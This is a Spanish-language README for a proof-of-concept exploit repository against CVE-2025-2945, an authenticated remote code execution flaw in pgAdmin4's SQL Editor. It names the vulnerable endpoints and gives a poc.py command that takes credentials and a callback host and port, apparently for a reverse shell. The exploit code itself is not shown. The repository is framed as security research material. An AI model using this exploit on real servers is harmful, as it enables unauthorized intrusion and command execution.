
Exploit de prueba de concepto para ejecución remota de código autenticada en pgAdmin4 (CVE-2025-2945) mediante abuso del Editor SQL. Diseñado para pruebas de seguridad autorizadas y educación.
Este repositorio contiene un script de prueba de concepto creado para investigación de seguridad y pruebas de penetración autorizadas que involucran la vulnerabilidad CVE-2025-2945, que afecta a ciertas versiones de pgAdmin4.
El problema permite que un usuario autenticado de pgAdmin con acceso al Editor SQL ejecute código de forma remota abusando del flujo de inicialización del panel de Query Tool. Este PoC demuestra la vulnerabilidad solo con fines educativos, de auditoría y defensivos.
Esta herramienta está destinada SOLO a:
NO utilices esta herramienta en ningún sistema sin permiso explícito. El uso no autorizado es ilegal y poco ético. El autor no es responsable del mal uso.
La vulnerabilidad se origina por fallos lógicos en los endpoints de inicialización del Editor SQL. Al interactuar con /sqleditor/initialize/ y /sqleditor/panel/, la aplicación maneja incorrectamente datos controlados por el usuario, lo que finalmente permite que payloads manipulados ejecuten comandos arbitrarios en el backend.
El PoC explota la siguiente secuencia de endpoints:
requestspython3 poc.py \
--target-url <pgadmin-url> \
--username <pgadmin-user> \
--password <pgadmin-pass> \
--db-user <db-username> \
--db-pass <db-password> \
--db-name <database> \
--Rhost <your-ip> \
--Rport <your-port>
(En la sección de ayuda del script ya se proporciona un ejemplo completo.)
poc.py → The exploit proof-of-concept
README.md → Project documentation
Los administradores deben:
Autor: UdayVeer